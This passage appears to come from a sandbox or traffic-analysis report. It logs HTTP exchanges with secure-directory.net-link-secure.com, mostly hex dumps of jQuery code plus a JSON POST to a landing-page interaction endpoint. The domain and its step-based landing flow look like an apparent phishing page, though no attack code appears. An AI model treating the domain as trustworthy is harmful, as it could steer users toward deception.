2e 65 78 70 61 6e 64 6f 5d 3a 6d 2e 65 78 70 61 6e 64 6f 3b Data Ascii: j[k].data,b)),g=j[k],e\|\|(g.data\|\|(g.data={}),g=g.data),void 0!==d&&(g[m.camelCase(b)]=d),"string"==typeof b?(f=g[b],null==f&&(f=g[m.camelCase(b)])):f=g,f}}function R(a,b,c){if(m.acceptData(a)){var d,e,f=a.nodeType,g=f?m.cache:a,h=f?a[m.expando]:m.expando;
2024-12-27 09:32:46 UTC	16384	IN	Data Raw: 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 29 3b 72 62 2e 6f 70 74 67 72 6f 75 70 3d 72 62 2e 6f 70 74 69 6f 6e 2c 72 62 2e 74 62 6f 64 79 3d 72 62 2e 74 66 6f 6f 74 3d 72 62 2e 63 6f 6c 67 72 6f 75 70 3d 72 62 2e 63 61 70 74 69 6f 6e 3d 72 62 2e 74 68 65 61 64 2c 72 62 2e 74 68 3d 72 62 2e 74 64 3b 66 75 6e 63 74 69 6f 6e 20 75 62 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 65 3d 30 2c 66 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 21 3d 3d 4b 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 62 7c 7c 22 2a 22 29 3a 74 79 70 65 6f 66 20 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 21 3d 3d 4b 3f 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 62 7c 7c 22 2a Data Ascii: reateElement("div"));rb.optgroup=rb.option,rb.tbody=rb.tfoot=rb.colgroup=rb.caption=rb.thead,rb.th=rb.td;function ub(a,b){var c,d,e=0,f=typeof a.getElementsByTagName!==K?a.getElementsByTagName(b\|\|""):typeof a.querySelectorAll!==K?a.querySelectorAll(b\|\|"
2024-12-27 09:32:47 UTC	16384	IN	Data Raw: 6e 6f 64 65 54 79 70 65 26 26 61 2e 65 6c 65 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 28 61 2e 65 6c 65 6d 5b 61 2e 70 72 6f 70 5d 3d 61 2e 6e 6f 77 29 7d 7d 2c 6d 2e 65 61 73 69 6e 67 3d 7b 6c 69 6e 65 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 2c 73 77 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 2e 35 2d 4d 61 74 68 2e 63 6f 73 28 61 2a 4d 61 74 68 2e 50 49 29 2f 32 7d 7d 2c 6d 2e 66 78 3d 5a 62 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 69 74 2c 6d 2e 66 78 2e 73 74 65 70 3d 7b 7d 3b 76 61 72 20 24 62 2c 5f 62 2c 61 63 3d 2f 5e 28 3f 3a 74 6f 67 67 6c 65 7c 73 68 6f 77 7c 68 69 64 65 29 24 2f 2c 62 63 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5b 2b 2d 5d 29 3d 7c 29 28 22 2b 53 2b 22 29 28 5b Data Ascii: nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},m.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2}},m.fx=Zb.prototype.init,m.fx.step={};var $b,_b,ac=/^(?:toggle\|show\|hide)$/,bc=new RegExp("^(?:([+-])=\|)("+S+")([
2024-12-27 09:32:47 UTC	14243	IN	Data Raw: 61 74 61 54 79 70 65 73 3b 77 68 69 6c 65 28 22 2a 22 3d 3d 3d 69 5b 30 5d 29 69 2e 73 68 69 66 74 28 29 2c 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 61 2e 6d 69 6d 65 54 79 70 65 7c 7c 62 2e 67 65 74 52 65 73 70 6f 6e 73 65 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 29 29 3b 69 66 28 65 29 66 6f 72 28 67 20 69 6e 20 68 29 69 66 28 68 5b 67 5d 26 26 68 5b 67 5d 2e 74 65 73 74 28 65 29 29 7b 69 2e 75 6e 73 68 69 66 74 28 67 29 3b 62 72 65 61 6b 7d 69 66 28 69 5b 30 5d 69 6e 20 63 29 66 3d 69 5b 30 5d 3b 65 6c 73 65 7b 66 6f 72 28 67 20 69 6e 20 63 29 7b 69 66 28 21 69 5b 30 5d 7c 7c 61 2e 63 6f 6e 76 65 72 74 65 72 73 5b 67 2b 22 20 22 2b 69 5b 30 5d 5d 29 7b 66 3d 67 3b 62 72 65 61 6b 7d 64 7c 7c 28 64 3d 67 29 7d 66 3d 66 7c 7c 64 Data Ascii: ataTypes;while("*"===i[0])i.shift(),void 0===e&&(e=a.mimeType\|\|b.getResponseHeader("Content-Type"));if(e)for(g in h)if(h[g]&&h[g].test(e)){i.unshift(g);break}if(i[0]in c)f=i[0];else{for(g in c){if(!i[0]\|\|a.converters[g+" "+i[0]]){f=g;break}d\|\|(d=g)}f=f\|\|d

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:48 UTC	738	OUT	POST /api/landingPage/web_interaction HTTP/1.1 Host: secure-directory.net-link-secure.com Connection: keep-alive Content-Length: 76 sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/json Accept: / Origin: https://secure-directory.net-link-secure.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:48 UTC	76	OUT	Data Raw: 7b 22 67 75 69 64 22 3a 22 66 62 62 30 35 35 39 65 62 65 31 39 31 31 65 66 62 35 33 63 30 32 34 32 61 63 31 39 30 31 30 32 22 2c 22 73 74 65 70 5f 69 64 22 3a 22 33 22 2c 22 71 72 5f 72 65 71 75 65 73 74 22 3a 66 61 6c 73 65 7d Data Ascii: {"guid":"fbb0559ebe1911efb53c0242ac190102","step_id":"3","qr_request":false}
2024-12-27 09:32:48 UTC	330	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 09:32:48 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin, Cookie Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:49 UTC	675	OUT	GET /favicon.ico HTTP/1.1 Host: secure-directory.net-link-secure.com Connection: keep-alive sec-ch-ua: "Not_A Brand";v="99", "Google Chrome";v="109", "Chromium";v="109" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://secure-directory.net-link-secure.com/landingPage/3/fbb0559ebe1911efb53c0242ac190102 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:49 UTC	143	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 27 Dec 2024 09:32:49 GMT Content-Type: text/html Content-Length: 548 Connection: close
2024-12-27 09:32:49 UTC	548	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Timestamp	Bytes transferred	Direction	Data
2024-12-27 09:32:50 UTC	391	OUT	GET /api/landingPage/web_interaction HTTP/1.1 Host: secure-directory.net-link-secure.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-27 09:32:50 UTC	209	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 27 Dec 2024 09:32:50 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close X-Frame-Options: SAMEORIGIN Vary: origin, Cookie